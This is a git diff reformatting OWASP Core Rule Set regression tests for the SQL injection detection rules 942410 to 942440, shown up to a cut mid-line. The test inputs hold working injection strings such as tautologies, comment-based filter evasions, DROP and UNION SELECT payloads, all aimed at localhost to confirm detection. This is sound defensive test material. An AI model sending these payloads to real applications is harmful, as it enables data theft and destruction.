[942410] + - test_id: 104 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=unhex%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 105 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=uNhEx%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 106 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=updatexml%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 107 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UpdateXML%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 108 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UPPER%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 109 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 110 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user%2F%3F%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 111 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 112 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=values+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 113 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=VALUES%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 114 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=version%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 115 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=version%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 116 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xmltype%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 117 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=XMLType%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 118 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=year%5D%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml index 576280e..b0d3ee0 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942420.yaml +rule_id: 942420 tests: - - test_title: 942420-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "942420" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [942420] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml index cca5bfa..4b71697 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942421.yaml +rule_id: 942421 tests: - - test_title: 942421-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "cookie=@@@@@@@@@@@@@" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942421" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "cookie=@@@@@@@@@@@@@" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942421] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml index aa1a717..b8e7324 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942430.yaml +rule_id: 942430 tests: - - test_title: 942430-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=(((((())))))&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942430" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=(((((())))))&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942430] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml index fb9b2e0..0254f21 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942431.yaml +rule_id: 942431 tests: - - test_title: 942431-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-------------------&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942431" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-------------------&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942431] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml index b30a904..0a34adc 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942432.yaml +rule_id: 942432 tests: - - test_title: 942432-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=;;dd foo bar" - version: HTTP/1.0 - output: - log_contains: id "942432" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=;;dd foo bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942432] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml index 508f028..7af4573 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml @@ -1,339 +1,337 @@ --- meta: author: "Christian S.J. Peron, Max Leske, azurit" - description: None - enabled: true - name: 942440.yaml +rule_id: 942440 tests: - - test_title: 942440-1 + - test_id: 1 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=DROP%20sampletable%3b--" - version: HTTP/1.0 - output: - log_contains: id "942440" - - test_title: 942440-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=DROP%20sampletable%3b--" + version: HTTP/1.0 + output: + log: + expect_ids: [942440] + - test_id: 2 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1;%00" - output: - log_contains: id "942440" - - test_title: 942440-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1;%00" + output: + log: + expect_ids: [942440] + - test_id: 3 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=OR 1# " - output: - log_contains: id "942440" - - test_title: 942440-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=OR 1# " + output: + log: + expect_ids: [942440] + - test_id: 4 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=admin'--" - output: - log_contains: id "942440" - - test_title: 942440-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=admin'--" + output: + log: + expect_ids: [942440] + - test_id: 5 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DROP/*comment*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DROP/*comment*/sampletable" + output: + log: + expect_ids: [942440] + - test_id: 6 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DR/**/OP/*bypass deny listing*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DR/**/OP/*bypass deny listing*/sampletable" + output: + log: + expect_ids: [942440] + - test_id: 7 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" - output: - log_contains: id "942440" - - test_title: 942440-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" + output: + log: + expect_ids: [942440] + - test_id: 8 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" - output: - log_contains: id "942440" - - test_title: 942440-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" + output: + log: + expect_ids: [942440] + - test_id: 9 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1# " - output: - log_contains: id "942440" - - test_title: 942440-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1# " + output: + log: + expect_ids: [942440] + - test_id: 10 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1-- -" - output: - log_contains: id "942440" - - test_title: 942440-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1-- -" + output: + log: + expect_ids: [942440] + - test_id: 11 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1/*" - output: - log_contains: id "942440" - - test_title: 942440-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1/*" + output: + log: + expect_ids: [942440] + - test_id: 12 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=1='1' or-- -" - output: - log_contains: id "942440" - - test_title: 942440-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=1='1' or-- -" + output: + log: + expect_ids: [942440] + - test_id: 13 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!50000or*/1='1" - output: - log_contains: id "942440" - - test_title: 942440-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!50000or*/1='1" + output: + log: + expect_ids: [942440] + - test_id: 14 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!or*/1='1" - output: - log_contains: id "942440" - - test_title: 942440-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!or*/1='1" + output: + log: + expect_ids: [942440] + - test_id: 15 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=0/**/union/*!50000select*/table_name`foo`/**/" - output: - log_contains: id "942440" - - test_title: 942440-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=0/**/union/*!50000select*/table_name`foo`/**/" + output: + log: + expect_ids: [942440] + - test_id: 16 desc: "Avoid False Positive on JWT (body)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + log: + no_expect_ids: [942440] + - test_id: 17 desc: "Avoid False Positive on JWT (cookie)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "foo=bar" - output: - no_log_contains: id "942440" - - test_title: 942440-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "foo=bar" + output: + log: + no_expect_ids: [942440] + - test_id: 18 desc: "Avoid False Positive on JWT (querystring)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + log: + no_expect_ids: [942440] + - test_id: 19 desc: "False positive against Facebook click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" - output: - no_log_contains: id "942440" - - test_title: 942440-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" + output: + log: + no_expect_ids: [942440] + - test_id: 20 desc: "False positive against Google click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" - output: - no_log_contains: id "942440" + - input: + dest_addr: 